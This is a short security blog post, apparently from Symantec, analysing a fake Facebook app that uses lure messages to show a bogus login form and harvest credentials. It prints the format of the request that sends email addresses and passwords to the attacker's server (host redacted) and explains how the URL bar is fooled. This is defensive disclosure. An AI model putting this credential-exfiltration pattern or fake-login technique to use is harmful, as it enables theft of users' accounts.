Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:
Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:
When the user clicks on the “Login” button, it will show the login form:
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:
http://IPRemoved/log.php?email=<email address>&pass=<password>
Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.
The following are the fiddler logs that show email addresses and passwords being posted to the malicious server:
The bogus app also "likes" the link in an automatic post, which will be displayed on the user's profile:
We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools' prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:
The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.